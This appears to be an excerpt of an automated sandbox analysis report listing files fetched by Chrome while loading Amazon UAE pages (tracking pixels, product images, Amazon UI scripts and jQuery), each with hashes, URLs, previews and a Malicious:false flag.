                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (868)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):45047
                                                                                                                                                                                                                                                                Entropy (8bit):5.6295063775589975
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:93gH7LGLsefSvvGeH7uRcWxcxoxXkDIIxrxtiXxq:KIsef+ixcxox0UIxrxyxq
                                                                                                                                                                                                                                                                MD5:0609C804B4AF3A5B7AAF2625FA534FAB
                                                                                                                                                                                                                                                                SHA1:C38C215156EF69FD048740BC5204E69D211068DB
                                                                                                                                                                                                                                                                SHA-256:1017F870F22A6E6263DEDD0BE6D31FCC6DB9762F9540EAF31EE827B710A76D7B
                                                                                                                                                                                                                                                                SHA-512:D6F316E751509E9CE01ECA64AF78473D87FC2E70F3B3F027A222D812FF1CF67585ABEB5B73534A388D4FEBB392667AC203A6F0832EE6E19325BCDC4D633A4B27
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:(function(c){var b=window.AmazonUIPageJS||window.P,d=b._namespace||b.attributeErrors,a=d?d("ALMSavingsAssets@core","ALMSavings"):b;a.guardFatal?a.guardFatal(c)(a,window):a.execute(function(){c(a,window)})})(function(c,b,d){});./* ******** */.(function(c){var b=window.AmazonUIPageJS||window.P,d=b._namespace||b.attributeErrors,a=d?d("ConsumablesATCActionAssets",""):b;a.guardFatal?a.guardFatal(c)(a,window):a.execute(function(){c(a,window)})})(function(c,b,d){});./* ******** */.(function(e){var g=window.AmazonUIPageJS||window.P,n=g._namespace||g.attributeErrors,q=n?n("ALMCartActionAssets",""):g;q.guardFatal?q.guardFatal(e)(q,window):q.execute(function(){e(q,window)})})(function(e,g,n){function q(c,b){try{e.register(c,b)}catch(d){if(!d.message.includes("reregistered by ALMCartActionAssets"))throw d;}}function E(){var c=arguments;return{register:function(b,d){try{e.when.apply(e,c).register(b,d)}catch(a){if(!a.message.includes("reregistered by ALMCartActionAssets"))throw a;.}}}}e.when("ALMCar
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):71
                                                                                                                                                                                                                                                                Entropy (8bit):4.19644707821733
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                                                                                MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                                                                                SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                                                                                SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                                                                                SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://www.amazon.ae/rd/uedata?ld&v=0.294992.0&id=6NXZ98JFWKRECR4538X7&sw=1280&sh=1024&vw=1263&vh=907&m=1&sc=6NXZ98JFWKRECR4538X7&ue=7&bb=102&ns=137&ne=227&be=629&fp=198&fcp=198&pc=24797&tc=-1555&na_=-1555&ul_=-1723469094449&_ul=-1723469094449&rd_=-1723469094449&_rd=-1723469094449&fe_=-1551&lk_=-1502&_lk=-1502&co_=-1502&_co=-760&sc_=-1488&rq_=-760&rs_=-43&_rs=466&dl_=-33&di_=656&de_=657&_de=701&_dc=24796&ld_=24797&_ld=-1723469094449&ntd=0&ty=0&rc=0&hob=5&hoe=7&ld=24798&t=1723469119247&ctb=1&rt=__ld:92-9-2-75-7-6-1&csmtags=aui|aui:aui_build_date:3.24.6-2024-08-06|mutObsYes|ewc:unpersist|ewc:unpersist:emptycart|ewc:bview|ewc|ewc:unrec|ewc:cartsize:0|ewc:aui|navbar|aui:css:cache|aui:js:cache|mutObsActive|FWCIMEnabled|fls-eu-amazon-ae|adblk_no|perfYes|fy_cdn_fr|fy_cdn_mp|csm-feature-touch-enabled:false|aui:sw:page_proxy:request_feature_tags:timed_out&viz=visible:6&pty=zeitgeist&spty=bs&pti=undefined&tid=6NXZ98JFWKRECR4538X7&aftb=1&lob=1
                                                                                                                                                                                                                                                                Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:PNG image data, 350 x 450, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):14256
                                                                                                                                                                                                                                                                Entropy (8bit):7.935047719221589
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:lxTA3vdo5DGwFf8U5JHP0gRUTKDrbymGanXyR5LdY/JBO:lxTAcGS0g6gRU+DK2nX02/JE
                                                                                                                                                                                                                                                                MD5:64224EC939AC0B3487645C4E109030D5
                                                                                                                                                                                                                                                                SHA1:B5AC2A7BC2AF1C9226987439F34BA8D4A79FBF0B
                                                                                                                                                                                                                                                                SHA-256:2818F0BCCC7DDAA8E893C4655473D82589146DCC6E7AA6F78CEB9B3D4440C809
                                                                                                                                                                                                                                                                SHA-512:9E2F8F391CA83B4DBD4170F91B30268F81D7F570E042699BD73135EA60BF3AE5AAA343F5BAE91430879DCF305914646499A6EF24C2E3CA604460585C3CCA7E31
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/G/39/gno/sprites/nav-sprite-global-1x-reorg-privacy._CB600087478_.png
                                                                                                                                                                                                                                                                Preview:.PNG........IHDR...^..........QQ.....gAMA......a.....sRGB.........PLTEGpL...........................................................................................I..C..............................................................3..........................2...........-...............................................2........2..*...........3..2.....2...........1..2..........................2w.............2...w........v.......2.....-.....2............w....2.....2w........w....2..2..2.....3...$$$.....2...........2......w....2...w..222..2........2............w.......2.........333..........g.......8...........?R ...v..***...333v..v..............v..................f..e....222...................n....v.....222.f..e.......222.e.....g..d.........3......w.."/?.f....333.............r....~..1=L[..s.....mu.......Q[h...[eqdmx;GT\|......tRNS........@..........'`..<.F.Q......c.pD...+..0.#3wJ.........m.^[...7_..V.....N.....s....fA...../...{..|N....j..l..-Mv&i.9#..~..$...6i...e9...D.y0xy/...zG..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):21135
                                                                                                                                                                                                                                                                Entropy (8bit):7.955908489556472
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:qcdRnAFWAzXAJjU4IlmAC+U/VrSQmExoSNfhkAjGaavJ0tsGb7EdICjGUaOcGFf:PXAJzXAp9l3dzriScnatNb7GICglGFf
                                                                                                                                                                                                                                                                MD5:5B8AA776853A2BE2ED42227F168D6E2B
                                                                                                                                                                                                                                                                SHA1:E79C2E2E9299F78278D2B309A41F53927DB4495E
                                                                                                                                                                                                                                                                SHA-256:25202C39CF60E2B3E051523D15863D9423EF8428958C92D3A8F3322A2D80748A
                                                                                                                                                                                                                                                                SHA-512:B6D5845B89DCC642AA42E46E02A0D6ADB9776424147DADF60250ECC8FA5069D36DB7F291EFE6D08962F7E73F368E5C19BEEF363A4723BD86BACDF4B11A2E5DC1
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/81ZqHezuUOL._AC_UL450_SR450,320_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........5..................................................................X.......8.JD.........O.j/_u|.xh._.....g..T......[."..}.an.<.5.D......>i....;.......+..y.../......{.}w..".$sZZ.W..eE&Y.O....w....qn...`v.m..].S+..jq..m...G.......M.....p....g.v'...........+{".WX......g.....x7...o.^.&Y.....mZ....c.>w.3...8k.#....r.n1.....q.z^#..tMqk~...5..3-...........AgP.....|..}.a.n..[.....?......Y5q|QSO-...x.^;2..v...V..<....[U6^;_..s...3iv.X..\....G.M....tAj.[..f.O...........L.Eq...]<.w.I...W.^......}.J.......J...3....S.b.....:p...J`..w.[....;.=.........j.]...}...++.}.g.'g.m#..a..........W5..:..<Y......./.3.~..P.@...ZS.*.....:..F#4.}W...9#..j..zZ...Q.zv../.,..-...._iJ'.Go}'...Ey...K..g...0...W.-~.2..l.<...i@g.n...J.....=..f..+k.E._R.(.-......7.C9.......4...H....*.4....8.<.9.....:..~.M....x
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):48950
                                                                                                                                                                                                                                                                Entropy (8bit):7.963333607058689
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:83AZUS01W7NNNNKzXxmQViG7l0wK+4x0Zc/TfigEC+Vne8oWNIIzYUSuhO7jaZMM:aIUt1lx/VBlm+ZcDibC+VBocsUSv7Ia4
                                                                                                                                                                                                                                                                MD5:A7350B040766C811565CE21F8D833908
                                                                                                                                                                                                                                                                SHA1:1F8DAEF415AFD88E5D8B485E5C7D62941492BCD3
                                                                                                                                                                                                                                                                SHA-256:EA2AC38C7E469084C70A134C536A212791FFC8AE20DEC4719ED555F6C61314AF
                                                                                                                                                                                                                                                                SHA-512:F8DDA1C80EFBB0AA28C84E85276A495D226C53DA58665642DB7F3E9671C1CA3ED38E26BC58CBD8D41565B506B70916F99F7D13304AD5C1FC79BCC08EF9CBA31F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986213_UAE_Budget_Store_AE_xsite_bubbler_beauty_en_400x400_2X._CB644457596_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................................;...................................................................................[a.....]...p.6.[..?\...^_~.U.._..J.......................`.....^...(.vE....../{~.H.]!%.!.9..~............ti....sdV.9..w8........%.*fv.......>P........~x...;4Ch.$){6............S&{F.%,..................+-..............lw<vM..\.l.........&[....].......r\4.z.'.~h.?:....z.....<S..o.......D87!......8}.....?.E..o.O.{.E..F....G..'x....1.l..........L...%.. .....,......@......u/{o......\...co5k.'.;bS....G...h...E[.m.5.*...e7#....i........D9.r8......y.../...Mb.k..t......H....ik.8wk-.....T..^.N....O`.b.(.0'Tv....;E...5.,.q.......<........n....i.L.2{...E..?*.-...9.-....4<u."..eW.s........H."e6.....q...A..>...........u......a.MY..6..7.C..q.G.yfLM.1.......r........x...*.<..........8.{1...l0...........F<...].a.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):212
                                                                                                                                                                                                                                                                Entropy (8bit):5.024547197873229
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:2LGDtF4IzO/Bqkhab4KYK7ozXRX+1MRR1anMAuLhtI:2Q3JC/BVab4NK7ozgMzI
                                                                                                                                                                                                                                                                MD5:A89B195ADFBD74DF01D742D52F6A7CC1
                                                                                                                                                                                                                                                                SHA1:E317DA5F24B8E6A065C21D76CA4C1DFA1A6E7FFC
                                                                                                                                                                                                                                                                SHA-256:9B411C1889EAE287307FC107B63A057DCC591A991E6B659444D52DC745161347
                                                                                                                                                                                                                                                                SHA-512:EEA841E996291935051C3C8E8C98B5A549C309D4F45B619F15B339F69660F3A8673DF8C3F2352B3EE20EEC7B738617AE1343128D59D10A6E821642EFE79091E9
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:(function(c){var b=window.AmazonUIPageJS||window.P,d=b._namespace||b.attributeErrors,a=d?d("BuyBackCartAssets",""):b;a.guardFatal?a.guardFatal(c)(a,window):a.execute(function(){c(a,window)})})(function(c,b,d){});
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (562)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):317121
                                                                                                                                                                                                                                                                Entropy (8bit):5.382549810640479
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3072:xYcQZMuZ7q9P1+pKbaMKNwCe3DNEz7+OeQm81AWWwIty8cIQygwYvsjfq08:xYXUMKbaMKaC3m81bVItyb5wYUrq08
                                                                                                                                                                                                                                                                MD5:EDA8128C6BF3EBC56B6C8687CD5C8C74
                                                                                                                                                                                                                                                                SHA1:6AC6DDF899CFDCCF21D5D473FF96029EFEA4D2B5
                                                                                                                                                                                                                                                                SHA-256:F096709892C962D8E2C2E5A886DA566F5FF23095E0BA1D49CEFCD5F80B6459B5
                                                                                                                                                                                                                                                                SHA-512:4635AB9CDE70878F17B6A2975154233FF99B44FC965B01805CCD3E6DA888F3B47FFA9E1FD5BF6D0C644C95317FB62CD93F47C4BFCCC153ADDDAFEBEFFB54B9A7
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/61xJcNKKLXL._RC%7C11Y+5x+kkTL.js,51KMV3Cz2XL.js,31x4ENTlVIL.js,31f4+QIEeqL.js,01N6xzIJxbL.js,518BI433aLL.js,01rpauTep4L.js,31QZSjMuoeL.js,61ofwvddDeL.js,01KsMxlPtzL.js_.js?AUIClients/AmazonUI"
                                                                                                                                                                                                                                                                Preview:/*. jQuery JavaScript Library v1.6.4. http://jquery.com/.. Copyright 2011, John Resig. Dual licensed under the MIT or GPL Version 2 licenses.. http://jquery.org/license.. Includes Sizzle.js. http://sizzlejs.com/. Copyright 2011, The Dojo Foundation. Released under the MIT, BSD, and GPL Licenses... Amazon elects to use jQuery and Sizzle under the MIT license... Date: Mon Sep 12 18:54:48 2011 -0400. Sizzle CSS Selector Engine. Copyright 2011, The Dojo Foundation. Released under the MIT, BSD, and GPL Licenses.. More information: http://sizzlejs.com/.*/.(function(H){var r=window.AmazonUIPageJS||window.P,p=r._namespace||r.attributeErrors,J=p?p("AmazonUIjQuery","AmazonUI"):r;J.guardFatal?J.guardFatal(H)(J,window):J.execute(function(){H(J,window)})})(function(H,r,p){r.navigator&&r.navigator.userAgent&&H.declare("jQuery",function(){function J(a,b,d){if(d===p&&1===a.nodeType)if(d="data-"+b.replace(gb,"-$1").toLowerCase(),d=a.getAttribute(d),"string"===typeof d){try{d="true"===d?!0:"false"===
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x39, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):9461
                                                                                                                                                                                                                                                                Entropy (8bit):7.914567271701472
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:D2hRS1YzeKI34hEP58jb35gU6NyOGt7lUoNJqmn7DIWB:9KzrI34yB635ON5A7TJx7DjB
                                                                                                                                                                                                                                                                MD5:46407B5D65AABA2AD7B3633A80475EDE
                                                                                                                                                                                                                                                                SHA1:AE8129386B30ED4D22346D3AFB2C7963D50DA793
                                                                                                                                                                                                                                                                SHA-256:8AFFC3C8715D4CE3AC20C6637BE3920B2A84C3901913E6D8B88F83B2D18056C7
                                                                                                                                                                                                                                                                SHA-512:1524B465D5E5998523096BF8B1BF4B02097B37B9433D163F0351C91F8E42A1CDE211635B305BAFDB6211E4D4BF0B32AC4AB8F6F988384E50957436D601DC3886
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/G/39/consumables_uae/Amazonbasket/XCM_Manual_1532278_5307764_400x39_2X._CB616351825_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................'...............7...................................................................._...*.2...qR.D..ET.@.IAT..T.D.....D..@...u..d.2.%.,...D. 5Y..j.K5Y..,.d.2Y..d. 5Y.........?.$......B.-..o.E.mn..Q.?.+.(v..5s.@.kj..#..:_jh...gq.mo..E.K..,...!.j....0..x..J...4+..wpO[A.m........N.O.b-.".4-.1.+.)(.M......Vd.-k.eb..,O...6.....pA.~Our....$.u.\...z.0.c.Z..].%1BH..VO.\q...t.u.PF4D... .......,.g.)V78y9v.~}t...y....u.H..Y.../zb.64.r.<>.a....q.g'....i!..."{V....E.pl.UVe....&.}.X|...r...J[?.f....1H....{.....{.sMF.....o.{....A..Y/7.....&..2Md8w...7_F...|}..<z...3..x..a..Ns....>V..y.....$...s.2Q.....UY...S..b$.J*.J.BJ..d*.J$....J$@J..Es...%Y..,.d.d.%....d.P"Y...fK%Y..D.%....E...6.............................!%1Sd"23. 5AQ.#$4@BRTrt...........[........8.........._]Z....C..U.......(z..}}uJ>...._]N....G..S..k.R...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4622
                                                                                                                                                                                                                                                                Entropy (8bit):7.908400268313229
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:T1lewmvnLua2bE4kw74+z+R/NmiwEM3pcUJOw9jolaD:/ew2LGl4+iLmiwEe9j9
                                                                                                                                                                                                                                                                MD5:649B4EE9FE24FBF8B26690F4E4818AC4
                                                                                                                                                                                                                                                                SHA1:620E71A4EA5BA6722CB09DC16A0EAFAFCE0DA212
                                                                                                                                                                                                                                                                SHA-256:623DCBDFF322275F0A61572330F94EE0A43E4ECDEB4B12CFF2354C52770B74D2
                                                                                                                                                                                                                                                                SHA-512:B1A46FB51CF3AC899A27E753F42AA3414738E5EBAAB29D8E8D4C91C8313BD50B5272A2EA6BDD089F324C2520CE23534826921A136F10526CE7301CB2A670EC90
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!.1."A..2Q.#aq..3BRb...$......U.............................................1.!A..2QBRaq............?..:R.c.)JP.R..."..I.u.8...T@;.'.(.ZV.={O..K..x#Y.L..0"..g!w.q...lj......a......L...t...J....?.....8..|.)\......,p.......]2..)..G\eN..J.=_..}.?....-.....+.+.k.....R.8)JP.R......)@*...N- ...LR[.... s....L...T.u.*..p..O..I.OX...9w.:E-...;...0E..]...EuMFI.q.+ev. .|.0............f..-4xt;....X`IM....`..T.....TD..O...O.K.v.+..Heq...qN..K.u`.m .=..}.jW7.<.^..\...T..o...b..../:.F..G.)]H[mA.;....s.\..k.k[.ga.M.QJ..* (.......q..:..L..)..u...9#....NpA.^...2..1...`..{..7..^..=3Q.".......}b...Nm..c..I.A.@|..U..Ddpz..e[.......p....\^.+..^)._..P...#..4..4......f..........4.....]..&.....>..N|$.1......f.j.....b..t..)@)JP.R....8..J.A.:..V.=..b0Tm...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:PAGVV1BKBQP3X0S0NFTP$uedata=s:%2Fap%2Fuedata%3Fat%26v%3D0.295375.0%26id%3DPAGVV1BKBQP3X0S0NFTP%26m%3D1%26sc%3Dcsa%3Avl100%26vl100%3D365%26pc%3D3926%26at%3D3926%26t%3D1723469077944%26pty%3DAuthenticationPortal%26spty%3DSignInClaimCollect%26pti%3Dundefined%26tid%3DPAGVV1BKBQP3X0S0NFTP%26aftb%3D1%26lob%3D0:3927
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):71
                                                                                                                                                                                                                                                                Entropy (8bit):4.19644707821733
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                                                                                MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                                                                                SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                                                                                SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                                                                                SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 141x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):6310
                                                                                                                                                                                                                                                                Entropy (8bit):7.9402358955287005
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TKk0aejZtaGjKlgjLuVi3lIxQaa9LVHdRSDdKVdV2xpNVYESWjx9t0Xns0:v0aeFt0wSVolIqVOY2JiExxIr
                                                                                                                                                                                                                                                                MD5:7E019167B6974B2B9EF721303D7D963F
                                                                                                                                                                                                                                                                SHA1:F2FA35030EF087FBE4381269EDC5FF3E5B102C08
                                                                                                                                                                                                                                                                SHA-256:94B27D4A01E74ABD9152B53D484EBE50B78644E0EE6F1FDBEC15D1F0C2363BE0
                                                                                                                                                                                                                                                                SHA-512:090437B652272F59917668930AE9D55F4FA9F246DA5510E22EB3140E0D046CB4376A43CBD6744027B224E6C7A7A0B60CD283491D43A973AC820E121E85A2AFCE
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!..1AS..."3Q...#2Vs..RUaq......T.B................................................1...!QRa....q.#2B................?..{+(..I..(.%G......~.Sc. .....n...CY}..Q.6..Kq(P.i...ph....Fe~.U..`.K.`...u.<$...8...A.5..[XN...;`..NBz.$E].......C...[.'.&......ZB.F..Q.......%A.ov2.R....Q..O.).`....P..`...u.<$.....u.<$...F..?@....F..?@.Q..O.*i@GQ..O.).`.......)%`HEb@.8Q.B.dY..f....a.s..[.... =...u.>....:...~.N.....U/g..TKf..m...^......TF..>.u;..k.2=z...i.P_p]....x.X..1.AE%.W..kve.&.b..0xI..q.i...'...I;.b.K'..f.:../@Jt.....z.....v..{T.j..s..g.c..hL..ISzs8V.....v..1<11yr....w.....4^$../.Cme._%.7.]2i...z.w..E.,L..F...D.\9RF....oJ.e...k.....A./...v.J..j..4^$../.O3E.M...t..<.J..b.!..}t...uo..]Z.f...%...h.I."_..[G..TzlO.:...........C._..x.|D.]<...7.K
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):39385
                                                                                                                                                                                                                                                                Entropy (8bit):7.948506994397826
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:8gLMZaPZ2SRcZakX05s/uZI4UzMjuqu2LN1EY0BX93cBdmfjuV:PZjrkX0+/uVfu2XqBX9sHmf0
                                                                                                                                                                                                                                                                MD5:C7F67E9EE30FC682775AF02FC3FE1967
                                                                                                                                                                                                                                                                SHA1:C70BDB7CB310C46B0EE8C7E66BA79633BF34D3A4
                                                                                                                                                                                                                                                                SHA-256:FB362B603C9FF81C9E9C43D107E55E7DA11CF9F0EFA04BE9C804AFD1AD6B428A
                                                                                                                                                                                                                                                                SHA-512:02D38553B7FB3EEAAA5C36133A9336C1339337C8BD728D64340F0A3B3D6886E7A91D618D66DA10FB79F8AC4BCB692E375363DB0B71BEF2DE518BD037BD258C8C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986225_UAE_Budget_Store_AE_xsite_home_en_400x400_2X._CB644457597_.jpg
